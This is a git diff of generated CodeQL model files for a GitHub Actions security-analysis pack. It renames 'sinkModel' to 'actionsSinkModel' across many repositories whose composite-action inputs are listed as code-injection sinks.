f5bdc3d4bcc9..ac8b8a5150ae 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 161022b8cbea..19e9448994eb 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 391b19170293..82c5713f9435 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 3a45707d59ef..2d4108331b91 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] - ["kubescape/kubescape", "*", "input.SUB_STRING", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index c2e3608f7458..ccd49962fa4b 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] - ["kubeshop/botkube", "*", "input.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index 9b8e9d1e7ed4..a7e56c8626d0 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] - ["kyverno/kyverno", "*", "input.sbom-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 954f2c346615..4c0df425e458 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] - ["lancedb/lance", "*", "input.vcpkg_token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index 31cb8acad9e5..a69f2303dbe4 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index 4c8df154d8e6..c2c87969e936 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] - ["layer5labs/meshmap-snapshot", "*", "input.mesheryToken", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index 8366d5119aea..c1c3bf433cdc 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] - ["ldc-developers/ldc", "*", "input.build_targets", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index a5d99cfc5e0f..af21dca82055 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] - ["ledgerhq/ledger-live", "*", "input.turborepo-server-port", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index e07d26e6a5f2..18fdeffe1ec2 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index 3fe7b27d9d53..ee67e8821744 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] - ["lf-edge/eve", "*", "input.dockerhub-account", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 664c28bfc553..49caeb5f1dcf 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] - ["libgit2/libgit2", "*", "input.container-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index 7b90ed202348..dda74b285da7 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] - ["lightning-ai/pytorch-lightning", "*", "input.pkg-folder", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index 62b31c2d3ef9..4b144103f8fb 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] - ["lightning-ai/torchmetrics", "*", "input.torch-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 427b75730abe..931658c0bb5e 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "input.docker-registry", "code-injection", "generated"] @@ -9,7 +9,7 @@ extensions: - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] - ["linkerd/linkerd2", "*", "input.tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index 441913730fa1..f29632176626 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] - ["logseq/publish-spa", "*", "input.theme-mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index cbb2b43a2d8e..1578e397369d 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] - ["macvim-dev/macvim", "*", "input.formula", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 2f981b5bd63e..17c45e0d8edd 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] - ["mamba-org/mamba", "*", "input.key_base", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index 5d3d44e914c8..4e26b8728001 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] - ["maplibre/maplibre-native", "*", "input.externalData", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index 7b41c1b27215..d5fa53d1bbb3 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index 505fbb220058..f90fb1c5e63e 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] - ["mavlink/qgroundcontrol", "*", "input.aws_key_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index 24223da3c896..d16c0792c6da 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] - ["mdanalysis/mdanalysis", "*", "input.full-deps", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index b529c0117f4d..4d009c2d47db 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] - ["medic/cht-core", "*", "input.password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index 6a46669f05db..afd875c22057 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] - ["medusajs/medusa", "*", "input.password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index ec2f45f31dbf..680bbe27bcb4 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] - ["metabase/metabase", "*", "input.github_token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index 3574855be3c0..ffe074d3dea9 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] - ["metamask/action-create-release-pr", "*", "input.created-pr-status", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index 4ee1b878e54b..e53a58412c9e 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index 8453a2d415c6..a899f727e395 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index dc86b7959812..0c7c2e1bded6 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] - ["microsoft/playwright", "*", "input.connection_string", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index ca9cc034d10f..3d631e60dc37 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] - ["microsoft/wsl", "*", "input.similar_issues_text", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index b8aecfd5e3dc..2f8710d2cbd0 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index e7ac083da836..5490e62cdc91 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index 5cac21a07514..0c6df201a1c9 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] - ["modin-project/modin", "*", "input.runner", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 83e1345edf20..7d0b894f35d8 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] - ["mozilla/addons-server", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index 8708afa3f3bb..d85418c7a41e 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index e4f1637603e8..074cf066e373 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index f8b636c46365..c4497b59af8e 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index f51d784d7c1a..cc28e15a55b0 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] - ["mumble-voip/mumble", "*", "input.type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index ac6af801a0e5..76fb41dadf10 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index fb676663019e..b786a672140d 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] - ["nats-io/nats-server", "*", "input.hub_password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 503386ea3d47..236ac8f2cd21 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] - ["nearform-actions/optic-release-automation-action", "*", "input.actor-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index 6d48d32e9faf..64207dbca6ab 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] - ["nektos/act", "*", "input.composite-input", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index ae6d1fcc1e83..46de0ff86c67 100644 --- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index 48b982257211..a07b223777b0 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] - ["neondatabase/neon", "*", "input.real_s3_region", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index 14bfe57eb113..e3470982f53d 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 4b04351ab904..87535288d265 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 755147a6f1ad..28249c824287 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] - ["nix-community/nixos-wsl", "*", "input.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml 